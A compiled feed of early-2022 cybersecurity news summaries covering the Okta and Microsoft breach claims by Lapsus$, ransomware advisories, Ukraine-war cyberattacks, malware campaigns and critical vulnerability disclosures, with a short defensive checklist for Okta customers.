    Google has removed an app with over 1000,000 downloads from its Play Store after security researchers warned that the app was able to harvest the Facebook credentials of smartphone users. Researchers at French mobile security firm Pradeo said the app embeds Android trojan malware known as "Facestealer" because it dupes victims into typing in their Facebook credentials to a web page that transmits the credentials to the attacker's server, which happens to be a domain that was registered in Russia.

    Hundreds of HP Printer Models Vulnerable to Remote Code Execution

    HP has published security advisories for three critical-severity vulnerabilities affecting hundreds of its LaserJet Pro, Pagewide Pro, OfficeJet, Enterprise, Large Format, and DeskJet printer models. The three vulnerabilities are tracked as CVE-2022-24291 (high severity score: 7.5), CVE-2022-24292 (critical severity score: 9.8), and CVE-2022-24293 (critical severity score: 9.8) While not many details about these vulnerabilities have been published, the vulnerabilities could be exploited for information disclosure, remote code execution, and denial of service.

    BitRAT Malware Now Spreading as a Windows 10 License Activator

    A new BitRAT malware distribution campaign is underway, exploiting users looking to activate pirated Windows OS versions for free using unofficial Microsoft license activators. BitRAT is a powerful remote access trojan sold on cybercrime forums and dark web markets for as low as $20 (lifetime access) to any cybercriminal who wants it. As such, each buyer follows their own approach to malware distribution, ranging from phishing, watering holes, or trojanized software.

    Okta Investigating Claims of Customer Data Breach from Lapsus$ Group - Additional Recommendations

    1. Collect and preserve all Okta logs, focus on the Okta System Log as it's the main audit trail for Okta activities Need more info on this log check (https://developer.okta.com/docs/reference/api/system-log/)

    2. Search your audit log for suspicious activity focus on your superuser/admin Okta accounts as they pose the largest risk

    3. Rotate passwords for high-privileged accounts, at this stage it might be a bit early to rotate passwords for all users

    4. If you outsource (parts) of your Okta deployment check in with your vendor and make sure what 3rd party admin accounts are used and ask them for support

    5. Check if you currently have Okta support access enabled, you might want to disable that for the time being more info (https://help.okta.com/oie/en-us/Content/Topics/Settings/settings-support-access.htm)

    6. Check for (privileged) accounts created around the time of the suspected breach - 21 January 2022

    Okta Investigating Claims of Customer Data Breach from Lapsus$ Group

    Okta, a leading provider of authentication services and Identity and access management (IAM) solutions says it is investigating claims of data breach. On Tuesday, data extortion group Lapsus$ posted screenshots in their Telegram channel of what it alleges to be access to Okta's backend adminsitrative consoles and customer data. As a publicly-traded company worth over $6 billion, Okta employs over 5,000 people across the world and provides identity management and authentication services to major organizations including Siemens, ITV, Pret a Manger, Starling Bank, among others.

    U.S. Government Warns Companies of Potential Russian Cyberattacks

    The U.S. government on Monday once again cautioned of potential cyber attacks from Russia in retaliation for economic sanctions imposed by the west on the country following its military assault on Ukraine last month. "It's part of Russia's playbook," U.S. President Joe Biden said in a statement, citing "evolving intelligence that the Russian Government is exploring options."

    Russia-linked InvisiMole APT Targets State Organizations of Ukraine

    “The Government Team for Response to Computer Emergencies of Ukraine (CERT-UA) warns of spear-phishing messages conducted by UAC-0035 group (aka InvisiMole) against Ukrainian state bodies. The messages use an archive named “501 25 103.zip”, which contains a shortcut file. Upon opening the LNK file, an HTA file will be downloaded and executed on the victim’s computer. The HTA file contains a VBScript code that fetches and decodes the bait file and the malicious program LoadEdge backdoor.

    Western Digital App Bug Gives Elevated Privileges in Windows, macOS

    Western Digital's EdgeRover desktop app for both Windows and Mac are vulnerable to local privilege escalation and sandboxing escape bugs that could allow the disclosure of sensitive information or denial of service (DoS) attacks. EdgeRover is a centralized content management solution for Western Digital and SanDisk products, unifying multiple digital storage devices under a single management interface. It aims to increase usability and comfort by offering a variety of features including, content searching, filtering, categorization, collection creation, duplicate detection, and more.

    Microsoft Investigating Claims of Hacked Source Code Repositories

    Microsoft says they are investigating claims that the Lapsus$ data extortion hacking group breached their internal Azure DevOps source code repositories and stolen data. On Sunday, the Lapsus$ gang posted a screenshot on Telegram of alleged internal source code repositories, indicating that they hacked Microsoft’s Azure DevOps server. The screenshot posted by the gang showcased the DevOps repository which contained source code for Cortana and various Bing projects named 'Bing_STC-SV', 'Bing_Test_Agile', and "Bing_UX.

    FBI: AvosLocker Ransomware Targets US Critical Infrastructure

    The Federal Bureau of Investigation (FBI) warns of AvosLocker ransomware being used in attacks targeting multiple US critical infrastructure sectors. This was disclosed in a joint cybersecurity advisory published last week in coordination with the US Treasury Department and the Financial Crimes Enforcement Network (FinCEN). "AvosLocker is a Ransomware as a Service (RaaS) affiliate-based group that has targeted victims across multiple critical infrastructure sectors in the United States including, but not limited to, the Financial Services, Critical Manufacturing, and Government Facilities sectors," the FBI said.

    New Unix rootkit Used to Steal ATM banking Data

    Threat analysts following the activity of UNC2891 (LightBasin), a financially motivated group of hackers, report the discovery of a previously unknown Unix rootkit that is used to steal ATM banking data and conduct fraudulent transactions. The particular group of adversaries has been recently observed targeting telecom companies with custom implants, while back in 2020, they were spotted compromising managed service providers and victimizing their clients.

    Hackers claim to breach TransUnion South Africa with 'Password' password

    TransUnion South Africa has disclosed that hackers breached one of their servers using stolen credentials and demanded a ransom payment not to release stolen data. The African division of TransUnion operates in eight African countries offering commercial and consumer insurance and risk information solutions across various industries. According to the company's statement, an unauthorized person obtained access to a server based in South Africa using stolen credentials.

    DirtyMoe Botnet Gains New Exploits in Wormable Module to Spread Rapidly

    The malware known as DirtyMoe has gained new worm-like propagation capabilities that allow it to expand its reach without requiring any user interaction, the latest research has found. Active since 2016, the DirtyMoe botnet is used for carrying out cryptojacking and distributed denial-of-service (DDoS) attacks, and is deployed by means of external exploit kits like PurpleFox or injected installers of Telegram Messenger.

    Google Uncovers 'Initial Access Broker' Working with Conti Ransomware Gang

    Google's Threat Analysis Group (TAG) took the wraps off a new initial access broker that it said is closely affiliated to a Russian cyber crime gang notorious for its Conti and Diavol ransomware operations. Dubbed Exotic Lily, the financially motivated threat actor has been observed exploiting a now-patched critical flaw in the Microsoft Windows MSHTML platform (CVE-2021-40444) as part of widespread phishing campaigns that involved sending no fewer than 5,000 business proposal-themed emails a day to 650 targeted organizations globally.

    Popular NPM Package Updated to Wipe Russia, Belarus Systems to Protest Ukraine Invasion

    In what's yet another act of sabotage, the developer behind the popular "node-ipc" NPM package shipped a new version to protest Russia's invasion of Ukraine, raising concerns about security in the open-source and the software supply chain. Affecting versions 10.1.1 and 10.1.2 of the library, the changes introduced undesirable behavior by its maintainer RIAEvangelist, targeting users with IP addresses located either in Russia or Belarus, and wiping arbitrary file contents and replacing it with a heart emoji.

    Russian Cyclops Blink Botnet Launches Assault Against Asus Routers

    The Cyclops Blink botnet is now targeting Asus routers in a new wave of cyberattacks. Cyclops Blink, a modular botnet, is suspected of being the creation of Sandworm/Voodoo Bear, a Russian advanced persistent threat (APT) group. Several weeks ago, the UK National Cyber Security Centre (NCSC) and the United States' Cybersecurity and Infrastructure Security Agency (CISA), alongside the NSA and FBI, warned of the botnet's existence.

    SolarWinds Warns of Attacks Targeting Web Help Desk Instances

    SolarWinds warned customers of attacks targeting Internet-exposed Web Help Desk (WHD) instances and advised removing them from publicly accessible infrastructure (likely to prevent the exploitation of a potential security flaw). WHD is an enterprise helpdesk ticketing and IT inventory management software designed to help customers automate ticketing and IT asset management tasks.

    Microsoft Creates Tool to Scan MikroTik Routers for TrickBot Infections

    Microsoft released a scanner that detects MikroTik routers hacked by the TrickBot gang to act as proxies for command and control servers. TrickBot is a malware botnet distributed via phishing emails or dropped by other malware that has already infected a device. Once executed, TrickBot will connect to a remote command and control server to receive commands and download further payloads to run on the infected machine.

    Microsoft Creates Tool to Scan MikroTik Routers for TrickBot Infections

    Microsoft released a scanner that detects MikroTik routers hacked by the TrickBot gang to act as proxies for command and control servers. TrickBot is a malware botnet distributed via phishing emails or dropped by other malware that has already infected a device. Once executed, TrickBot will connect to a remote command and control server to receive commands and download further payloads to run on the infected machine.

    Russia Uses Deepfake of Zelensky to Spread Disinformation

    Meta has been forced to remove a deepfake of the Ukrainian President in which he appeared to call on the military to lay down their arms. Nathaniel Gleicher, head of security policy at the social media giant, announced the move in a series of tweets late on Wednesday. “Earlier today, our teams identified and removed a deepfake video claiming to show President Zelensky issuing a statement he never did. It appeared on a reportedly compromised website and then started showing across the internet. We’ve quickly reviewed and removed this video for violating our policy against misleading manipulated media, and notified our peers at other platforms.

    Major Internet Provider Warding Off Cyber Attacks to Keep Ukrainians Connected

    Attacks targeting Ukraine continue; in a recent report from CPOMagazine, ISPs are being targeted in coordinated attacks to disrupt internet activity for Ukrainian citizens, Governmental organizations, and private ones to disrupt operations and generate fear amongst Ukrainians. Internal sources said they could not pinpoint the source or those responsible for the cyberattacks that hit “key nodes of ISP networks, (CPOMagazine, 2022).” Both Triolan and Ukrtelecom, which have thousands of customers globally, have experienced random outages from the start of the Russian invasion on February 24 and onward. Reports suggest the outages have lasted from minutes to days, with the most prolonged outages from Triolan, where they temporarily disabled services so that they could be restored without intermittent interruption. The timeframe to restore services was increased because various networking devices required physical access for reconfiguration. The company has already restored more than two-thirds (70%) of the Internet nodes in Dnipro, Odesa, Kyiv, Kharkiv, Poltava, Zaporizhia, and Rivne, and stated that they are trying to stop the attackers as soon as possible and resume the network in all areas, according to a post from telegram.

    New Linux Botnet Exploits Log4J, Uses DNS Tunneling for Comms

    A recently discovered botnet under active development targets Linux systems, attempting to ensnare them into an army of bots ready to steal sensitive info, installing rootkits, creating reverse shells, and acting as web traffic proxies. The newly found malware, dubbed B1txor20 by researchers at Qihoo 360's Network Security Research Lab (360 Netlab), focuses its attacks on Linux ARM, X64 CPU architecture devices.

    OpenSSL Cert Parsing Bug Causes Infinite Denial of Service Loop

    OpenSSL has released a security update to address a vulnerability in the library that, if exploited, activates an infinite loop function and leads to denial of service conditions. Denial of service attacks may not be the most disastrous security problem. However, it can still cause significant business interruption, long-term financial repercussions, and brand reputation degradation for those affected.

    Dozens of Ransomware Variants Used In 722 Attacks Over 3 Months

    The ransomware space was very active in the last quarter of 2021, with threat analysts observing 722 distinct attacks deploying 34 different variants. This massive amount of activity creates problems for the defenders, making it harder to keep up with individual group tactics, indicators of compromise, and detection opportunities. Compared to Q3 2021, the last quarter had 18% higher attack volume, while the comparison to Q2 2021 results in a difference of 22%, so there’s a trend of increasing attack numbers.

    Thousands of Mobile Apps Expose User Data Via Cloud Misconfigurations

    A report recently published by flashpoint highlights the risk associated with cloud security and its various infrastructure. Checkpoint found that applications, otherwise known as 'apps,' are susceptible to data leaks due to misconfigurations of back-end cloud databases. In cloud computing, like on-premises configurations, a server in a closet provides clients or endpoints on local networks access to resources required to complete one's job function. The 'back end is the "cloud" section where databases or resources live. The front end includes the client's computer (or computer network) and the application required to access the cloud computing system. In this particular report, the client is a mobile device where applications or clients are either obtained through a third-party website or proprietary distribution platform like Android's 'Google Play Store,' Apples' App Store,' or for Jail Broken products, 'Cydia.’ During Checkpoint’s study, they discovered 2113 mobile applications where their Firebase back-end was exposed due to misconfigurations.

    German Government Advises Against Using Kaspersky Antivirus

    Germany's Federal Office for Information Security, BSI, is warning companies against using Kaspersky antivirus products due to threats made by Russia against the EU, NATO, and Germany. Kaspersky is a Moscow-based cybersecurity and antivirus provider founded in 1997, that has a long history of success, but also controversy over the company's possible relationship with the Russian government.

    Massive Phishing Campaign Uses 500+ Domains Leading to Fake Login Pages

    Large-scale phishing activity using hundreds of domains to steal credentials for Naver, a Google-like online platform in South Korea, shows infrastructure overlaps linked to the TrickBot botnet. The resources used for this attack show the sheer size of the cybercriminal effort to collect login data to be used in various attacks. Similar to Google, Naver provides a diverse set of services that range from web search to email, news, and the NAVER Knowledge iN online Q&A platform.

    CaddyWiper: More Destructive Wiper Malware Strikes Ukraine

    Researchers have uncovered a new form of wiper malware being used in assaults against Ukrainian organizations. On March 14, ESET published a Twitter thread documenting the malware, dubbed CaddyWiper, that was compiled on the same day it was deployed to target networks. The wiper -- the third discovered in as many weeks by the cybersecurity firm -- has been detected "on a few dozen systems in a limited number of organizations," according to ESET

    ‘GraphSteel’ and ‘GrimPlant’ Delivered via Fake Antivirus Updates: Ukrainian Organizations

    Security researchers from MalwareHunterTeam analyzed phishing emails targeting Ukrainian governmental agencies to ultimately infect targeted machines with Cobalt Strike Beacons by imitating legitimate antivirus companies through tainted or malicious (fake) updates. Aside from Cobalt Strike, the attackers also used a dropper, coincidently titled “dropper.exe,” which was used to obtain a ‘Go’ downloader that executed an additional file disguised as a java SDK, “An environment for building applications and components using the Java programming language.

    Israeli Government Websites Taken Offline in Large-Scale Cyber-Attack

    Israeli government websites were taken offline yesterday in what was described as the largest ever cyber-attack to be launched against the country. The widescale Distributed Denial of Service (DDoS) successfully took down the websites of Israel’s Prime Minister’s Office and its interior, health, justice and welfare ministries. However, all these websites appear to be operational again.

    Automotive Giant DENSO Hit by New Pandora Ransomware Gang

    Automotive parts manufacturer DENSO has confirmed that it suffered a cyberattack on March 10th after a new Pandora ransomware operation began leaking data allegedly stolen during the attack. DENSO is one of the world's largest automotive components manufacturers, supplying brands such as Toyota, Mercedes-Benz, Ford, Honda, Volvo, Fiat, and General Motors with a wide range of electrical, electronic, powertrain control, and various other specialized parts.

    QNAP Warns Severe Linux Bug Affects Most of Its NAS Devices

    Taiwanese hardware vendor QNAP warns most of its Network Attached Storage (NAS) devices are impacted by a high severity Linux vulnerability dubbed 'Dirty Pipe' that allows attackers with local access to gain root privileges. The 'Dirty Pipe' security bug affects Linux Kernel 5.8 and later versions, even on Android devices. If successfully exploited, it allows non-privileged users to inject and overwrite data in read-only files, including SUID processes that run as root.

    Russian Ransomware Gang Retool Custom Hacking Tools of Other APT Groups

    A Russian-speaking ransomware outfit likely targeted an unnamed entity in the gambling and gaming sector in Europe and Central America by repurposing custom tools developed by other APT groups like Iran's MuddyWater, new research has found. The unusual attack chain involved the abuse of stolen credentials to gain unauthorized access to the victim network, ultimately leading to the deployment of Cobalt Strike payloads on compromised assets, said Felipe Duarte and Ido Naor, researchers at Israeli incident response firm Security Joes, in a report published last week.

    Critical Infrastructure Threat as Ransomware Groups Target 'Enemies of Russia'

    The cybercrime underground has fractured into pro-Ukraine and pro-Russia camps, with the latter increasingly focused on critical national infrastructure (CNI) targets in the West, according to a new report from Accenture. The consulting giant’s Accenture Cyber Threat Intelligence (ACTI) arm warned that the ideological schism could spell mounting risk for Western organizations as pro-Kremlin criminal groups adopt quasi-hacktivist tactics to choose their next victims.

    Anonymous Claims to Have Hacked German Subsidiary of Russian Energy Giant Rosneft

    The Anonymous hacker collective claimed to have hacked the German branch of the Russian energy giant Rosneft. (In a post this week), hacktivists announced to have stolen 20 terabytes of data from the company. According to the German website WELT, the attack on Rosneft Deutschland GmbH will have “relevant effects.” The news of the attack was also confirmed by the German Federal Office for Information Security (BSI), the company had reported an IT security incident on Saturday night.

    Corporate Website Contact Forms Used to Spread BazarBackdoor Malware

    The stealthy BazarBackdoor malware is now being spread via website contact forms rather than typical phishing emails to evade detection by security software. BazarBackdoor is a stealthy backdoor malware created by the TrickBot group and is now under development by the Conti ransomware operation. This malware provides threat actors remote access to an internal device that can be used as a launchpad for further lateral movement within a network. The BazarBackdoor malware is usually spread through phishing emails that include malicious documents that download and install the malware.

    Malware Disguised as Security Tool Targets Ukraine's IT Army

    A new malware campaign is taking advantage of people's willingness to support Ukraine's cyber warfare against Russia to infect them with password-stealing Trojans. Last month, the Ukrainian government announced a new IT Army composed of volunteers worldwide who conduct cyberattacks and DDoS attacks against Russian entities. This initiative has led to a outpouring of support by many people worldwide who have been helping target Russian organizations and sites, even if that activity is considered illegal.

    Leaks of Conti Ransomware Group Paint Picture of a Surprisingly Normal Tech Start-Up… Sort Of

    You’ve probably heard of the Conti ransomware group. After their 2020 emergence, they’ve accumulated at least 700 victims, where by “victims” we mean ‘big fish’ corporations with millions of dollars in revenue; unlike your average neighborhood ransomware operation, Conti never cared for extorting your mother-in-law for her vacation photos. For a while, Conti was the face of ransomware, along with fellow gang REvil – until this February, when 14 REvil operatives were arrested by the Russian authorities, leaving Conti effectively alone in its position as a major league ransomware operation. At the time, this was cautiously hailed as a sign of goodwill on Russia’s part; some figured that possibly the Russians would finally refuse to tolerate the incessant and irreverent attacks originating on Russian soil and targeted at western corporate offices, schools and hospitals. Now, a month later and two weeks into the full-blown war between Russia and Ukraine, this utopian vision does not seem so likely.

    Lapsus$ Ransomware Group is Hiring, It Announced Recruitment of Insiders

    Lapsus$ is a newer ransomware gang that recently made headlines after some prominent attacks on Nvidia and Samsung. “The dumps released as Torrent files contain gigabytes of sensitive documents, digital code-signing certificates and source codes. Hackers have leaked the credentials of more than 71,000 Nvidia employees, source code of NVIDIA’s DLSS (Deep Learning Super Sampling) AI rendering technology, information about six supposed unannounced GPUs, and 190GB of Samsung source codes related to trusted applets in the smartphone TrustZone environment” (Security Affairs, 2022). More recently, the Lapsus$ group claims to have stolen 200 GB of data from Vodafone.

    New Exploit Bypasses Existing Spectre-v2 Mitigations in Intel, AMD, Arm CPUs

    Researchers have disclosed a new technique that could be used to circumvent existing hardware mitigations in modern processors from Intel, AMD, and Arm and stage speculative execution attacks such as Spectre to leak sensitive information from host memory. Attacks like Spectre are designed to break the isolation between different applications by taking advantage of an optimization technique called speculative execution in CPU hardware implementations to trick programs into accessing arbitrary locations in memory and thus leak their secrets.

    Dirty Pipe Linux Flaw Allows Gaining Root Privileges on Major Distros - CISA ALERT - Dirty Pipe Linux CVE

    Dirty Pipe Privilege Escalation Vulnerability in Linux CISA is aware of a privilege escalation vulnerability in Linux kernel versions 5.8 and later known as “Dirty Pipe” (CVE-2022-0847). A local attacker could exploit this vulnerability to take control of an affected system. CISA encourages users and administrators to review (CVE-2022-0847) and update to Linux kernel versions 5.16.11, 5.15.25, and 5.10.102 or later.

    Iranian Hackers Targeting Turkey and Arabian Peninsula in New Malware Campaign

    The Iranian state-sponsored threat actor known as MuddyWater has been attributed to a new swarm of attacks targeting Turkey and the Arabian Peninsula with the goal of deploying remote access trojans (RATs) on compromised systems. "The MuddyWater supergroup is highly motivated and can use unauthorized access to conduct espionage, intellectual property theft, and deploy ransomware and destructive malware in an enterprise," Cisco Talos researchers Asheer Malhotra, Vitor Ventura, and Arnaud Zobec said in a report published today.

    Russia Creates Its Own TLS Certificate Authority to Bypass Sanctions

    Russia has created its own trusted TLS certificate authority (CA) to solve website access problems that have been piling up after sanctions prevent certificate renewals. The sanctions imposed by western companies and governments are preventing Russian sites from renewing existing TLS certificates, causing browsers to block access to sites with expired certificates.

    Joint Cyber Security Advisory - Conti Ransomware

    Conti cyber threat actors remain active and reported Conti ransomware attacks against U.S. and international organizations have risen to more than 1000. Notable attack vectors include Trickbot and Cobalt Strike (see below for details). While there are no specific or credible cyber threats to the U.S. homeland at this time, CISA, FBI, NSA, and the United States Secret Service (USSS) encourage organizations to review this advisory and apply the recommended mitigations.

    Critical Bugs Could Let Attackers Remotely Hack, Damage APC Smart UPS Devices

    Three high-impact security vulnerabilities have been disclosed in APC Smart-UPS devices that could be abused by remote adversaries as a physical weapon to access and control them in an unauthorized manner. Collectively dubbed TLStorm, the flaws "allow for complete remote takeover of Smart-UPS devices and the ability to carry out extreme cyber-physical attacks," Ben Seri and Barak Hadad, researchers from IoT security company Armis, said in a report published Tuesday.

    US Treasury: Russia May Bypass Sanctions Using Ransomware Payments

    The Treasury Department's Financial Crimes Enforcement Network (FinCEN) warned U.S. financial institutions this week to keep an eye out for attempts to evade sanctions and US-imposed restrictions following Russia's invasion of Ukraine. Although unlikely, FinCEN added that convertible virtual currency (CVC) — the term used by U.S. Treasury to describe unregulated digital currency like cryptocurrency — exchanges and other financial institutions may still observe transactions linked to crypto wallets associated with sanctioned Russian, Belarusian, and affiliated individuals.

    Russian Government Sites Hacked in Supply Chain Attack

    Russia says some of its federal agencies' websites were compromised in a supply chain attack on Tuesday after unknown attackers hacked the stats widget used to track the number of visitors by multiple government agencies The list of sites impacted in the attack includes the websites of the Energy Ministry, the Federal State Statistics Service, the Federal Penitentiary Service, the Federal Bailiff Service, the Federal Antimonopoly Service, the Culture Ministry, and other Russian state agencies.

    Emotet Growing Slowly But Steadily Since November Resurgence

    The notorious Emotet botnet is still being distributed steadily in the wild, having now infected 92,000 systems in 172 countries. While this may be a far cry from the once global dominance of having 1.6 million devices under its control, it shows that the malware is still undergoing a resurgence, and it’s getting stronger every day Emotet activity stopped in 2019 while its second major version was in circulation, and the malware returned only in November 2021, with the help of another malware known as Trickbot.

    FBI: RagnarLocker Ransomware Indicators of Compromise

    The FBI first became aware of RagnarLocker in April 2020 and subsequently produced a FLASH to disseminate known indicators of compromise (IOCs) at that time. This FLASH provides updated and additional IOCs to supplement that report. As of January 2022, the FBI has identified at least 52 entities across 10 critical infrastructure sectors affected by RagnarLocker ransomware, including entities in the critical manufacturing, energy, financial services, government, and information technology sectors. RagnarLocker ransomware actors work as part of a ransomware family1, frequently changing obfuscation techniques to avoid detection and prevention.

    Mozilla Firefox 97.0.2 Fixes Two Actively Exploited Zero-Day Bugs

    Mozilla has released Firefox 97.0.2, Firefox ESR 91.6.1, Firefox for Android 97.3.0, and Focus 97.3.0 to fix two critical zero-day vulnerabilities actively exploited in attacks. Both zero-day vulnerabilities are "Use-after-free" bugs, which is when a program tries to use memory that has been previously cleared. When threat actors exploit this type of bug, it can cause the program to crash while at the same time allowing commands to be executed on the device without permission.

    Piracy OK: Russia to Ease Software Licensing Rules After Sanctions

    The Russian authorities are drafting a set of measures to support the country's economy against the pressure of foreign sanctions, and when it comes to software licensing, the proposal greenlights a form of piracy. More specifically, the suggested plan is to establish a "unilateral" software licensing mechanism that would renew expired licenses without requiring the consent of the copyright or patent owner.

    Microsoft Fixes Critical Azure Bug That Exposed Customer Data

    Microsoft has addressed a vulnerability in the Azure Automation service that could have allowed attackers to take complete control over other Azure customers' data. Microsoft Azure Automation Service provides process automation, configuration management, and update management features, with each scheduled job running inside isolated sandboxes for each Azure customer.

    Rompetrol Gas Station Network Hit by Hive Ransomware

    BleepingComputer has learned that Hive ransomware gang is behind this attack, and they're asking for a muli-million ransom. Rompetrol is the operator of Romania's largest oil refinery, Petromidia Navodari, which has a processing capacity of over five million tons per year.

    Malware Now Using NVIDIA's Stolen Code Signing Certificates

    Last week, NIVIDA confirmed they were the targets of a cyber attack resulting in the loss of proprietary corporate data. Threat actors are now using stolen NVIDIA code signing certificates to sign malware. By signing certificates, malware appears to be trustworthy and malicious drivers can be loaded on Windows machines.

    Social Media Phishing Attacks Are at an All Time High

    Phishing campaigns continue to focus on social media, ramping up efforts to target users for the third consecutive year as the medium becomes increasingly used worldwide for communication, news, and entertainment. The targeting of social media is the highlighted finding in the 2021 Phishing report by cybersecurity firm Vade, who analyzed phishing attack patterns that unfolded throughout 2021.

    Hacktivists, Cybercriminals Switch to Telegram After Russian Invasion

    Telegram messaging has taken a pivotal role in the ongoing conflict between Russia and Ukraine, as it is being massively used by hacktivists and cybercriminals alike. According to a report from cybersecurity company Check Point, the number of Telegram groups has increased sixfold since February 24 and some of them, dedicated to certain topics, have ballooned in size, in some cases counting more than 250,000 members.

    CISA Warns Organizations to Patch 95 Actively Exploited Bugs

    The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has added 95 vulnerabilities to its list of actively exploited security issues, the largest number since issuing the binding operational directive (BOD) last year. Despite some of them being known for almost two decades, the agency notes that the bugs “pose significant risk to the federal enterprise.

    Microsoft Suspends All New Sales of Microsoft Products and Services in Russia

    In a March 4 blog post, Microsoft announced it will be suspending new sales of it’s products and services to Russia. Microsoft is "coordinating closely and working in lockstep with the governments of the United States, the European Union and the United Kingdom, and they are stopping many aspects of our business in Russia in compliance with governmental sanctions decisions.

    These Are the Sources of DDoS Attacks against Russia, Local NCCC Warns

    The list of domains includes the US CIA and FBI, USA Today, and Ukraine’s Korrespondent magazine, along with domains and apps specifically set up to target Russia amid the invasion. The advisory provides a list of recommendations for Russian organizations, including conducting an inventory of all network devices and services operating in their organization, restricting outside access to them, setting up logging systems, using complex and unique passwords, using Russian DNS servers, watching out phishing attacks, enforcing data backups.

    Free Decryptor Released for HermeticRansom Victims In Ukraine

    Avast has released a decryptor for the HermeticRansom ransomware strain used in targeted attacks against Ukrainian systems over the past ten days. The ransomware strain was delivered along with a computer worm named HermeticWizard and served more as a decoy in wiper attacks rather than a tool to support financial extortion. Still, its infections have disrupted vital Ukrainian systems.

    Popular Open-source PJSIP Library is Affected by Critical Flaws

    JFrog’s Security Research team today released five new vulnerabilities discovered in the popular PJSIP open-source multimedia communication library. “PJSIP is a communication library written in C language implementing standard-based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. It combines signaling protocol (SIP) with rich multimedia framework and NAT traversal functionality into high level API that is portable and suitable for almost any type of systems ranging from desktops, embedded systems, to mobile handsets

    Hackers Begin Weaponizing TCP Middlebox Reflection for Amplified DDoS Attacks

    Distributed denial-of-service (DDoS) attacks leveraging a new amplification technique called TCP Middlebox Reflection have been detected for the first time in the wild, six months after the novel attack mechanism was presented in theory. A middlebox is an in-network device that sits on the path between two communicating end-hosts and can monitor, filter, or transform packet streams in-flight. Unlike traditional network devices like routers and switches, middleboxes operate not only on packets’ headers but also on their payloads using Deep Packet Inspection.

    Hackers Try to Hack European Officials to Get Info on Ukrainian Refugees, Supplies

    Details of a new nation-state sponsored phishing campaign have been uncovered setting its sights on European governmental entities in what's seen as an attempt to obtain intelligence on refugee and supply movement in the region. Enterprise security company Proofpoint, which detected the malicious emails for the first time on February 24, 2022, dubbed the social engineering attacks.

    Targeted APT Activity: BABYSHARK Is Out for Blood

    Huntress released details on a newly discovered APT group that aligns with North Korean threat actors. The group has been known to target national security think tanks with a piece of malware called BABYSHARK. The state sponsored threat actors are using the customized malware to target specific victim networks in targeted attacks.

    Anonymous Hits Russian Nuclear Institute and Leaks Stolen Data

    Anonymous and numerous hacker groups linked to the popular collective continue to launch cyber attacks against Russian and Belarussian government organizations and private businesses” (Security Affairs, 2022). Ukraine has requested the help of IT “vigilantes” to help disrupt Russia operations in the area. Since then, massive DDoS attacks have been carried out against various Russian government entities including Duma and the Ministry of Defense.

    Ukrainian Officials, Military Targeted by Ghostwriter Hackers

    Facebook (now known as Meta) says it took down accounts used by a Belarusian-linked hacking group (UNC1151 or Ghostwriter) to target Ukrainian officials and military personnel on its platform. In November 2021, Mandiant security researchers linked the UNC1151 threat group with high confidence to the Belarusian government, as well as a hacking operation the company tracks as Ghostwriter. Facebook also blocked multiple phishing domains used by the threat actors to try and compromise the accounts of Ukrainian users

    Conti Ransomware's Internal Chats Leaked After Siding With Russia

    A Ukrainian security researcher has leaked over 60,000 internal messages belonging to the Conti ransomware operation after the gang sided with Russia over the invasion of Ukraine. BleepingComputer has independently confirmed the validity of these messages from internal conversations previously shared with BleepingComputer regarding Conti's attack on Shutterfly.

    Toyota Halts Production After Reported Cyberattack on Supplier

    Giant Japanese automaker Toyota Motors has announced that it stopped car production operations. The outage was forced by a system failure at one of its suppliers of vital parts, Kojima Industries, which reportedly suffered a cyberattack. Kojima Industries is a Japanese manufacturer of plastic components that are crucial for car production, so this is a case of severe supply chain interruption.

    Moscow Exchange Downed by Cyber-attack

    The website for the Moscow Stock Exchange was offline and inaccessible on Monday. A crowdsourced community of hackers endorsed by Kyiv officials has claimed responsibility for the outage. The Ukraine IT Army posted a message on Telegram that it had taken just five minutes to render the site inaccessible. A spokesperson for global internet connectivity tracking company NetBlocks told Forbes: “We can confirm the Moscow Exchange website is down, but we don’t have visibility into the incident’s root cause or the extent of the disruption.” Ukraine’s deputy prime minister, Mykhailo Fedorov, announced the formation of the IT Army on Twitter last week and published a link to a list of prominent Russian websites for the hackers to target. On the hit list were the websites of 31 Russian businesses and state organizations, including those of energy company Gazprom, oil producer Lukoil, three banks and several government websites. Following the IT Army’s Telegram post, Fedorov posted the following message on social media: “The mission has been accomplished! Thank you!”

    100 Million Samsung Galaxy Phones Affected with Flawed Hardware Encryption Feature

    The shortcomings are the result of an analysis of the cryptographic design and implementation of Android's hardware-backed Keystore in Samsung's Galaxy S8, S9, S10, S20, and S21 flagship devices, researchers Alon Shakevsky, Eyal Ronen, and Avishai Wool said. Trusted Execution Environments (TEEs) are a secure zone that provide an isolated environment for the execution of Trusted Applications (TAs) to carry out security critical tasks to ensure confidentiality and integrity. On Android, the hardware-backed Keystore is a system that facilitates the creation and storage of cryptographic keys within the TEE, making them more difficult to be extracted from the device in a manner that prevents the underlying operating system from having direct access.

    Destructive Malware Targeting Organizations in Ukraine

    The CISA and FBI joint advisory gives a high-level summary of the destructive malware being used, including both WhisperGate and HermeticWiper, against organizations in Ukraine to destroy computer systems and render them inoperable. It also includes open-source indicators of compromise (IOCs) for organizations to detect and prevent the malware from impacting their networks. Destructive malware can present a direct threat to an organization’s daily operations, impacting the availability of critical assets and data.

    Anonymous Hacking Group Declares “Cyber War” Against Russia

    The well-known international hacking collective made the announcement on its Twitter account on Thursday, shortly after the Kremlin commenced military action. The message read: “The Anonymous collective is officially in cyber war against the Russian government. #Anonymous #Ukraine.” Shortly after, the group claimed responsibility for taking down Russian government websites, including the Kremlin and State Duma.

    CISA Issues MuddyWater Warning

    Authorities in the UK and United States have issued an alert regarding a group of Iranian government-sponsored advanced persistent threat (APT) actors known as MuddyWater. The actors, who are also known as Earth Vetala, MERCURY, Static Kitten, Seedworm, and TEMP.Zagros, have been observed conducting cyber espionage and other malicious cyber operations in Asia, Africa, Europe and North America.

    TrickBot Gang Likely Shifting Operations to Switch to New Malware

    TrickBot, the infamous Windows crimeware-as-a-service (CaaS) solution that's used by a variety of threat actors to deliver next-stage payloads like ransomware, appears to be undergoing a transition of sorts, with no new activity recorded since the start of the year. The lull in the malware campaigns is "partially due to a big shift from Trickbot's operators, including working with the operators of Emotet," researchers from Intel 471 said in a report shared with The Hacker News.

    CISA Warns of Actively Exploited Vulnerabilities in Zabbix Servers

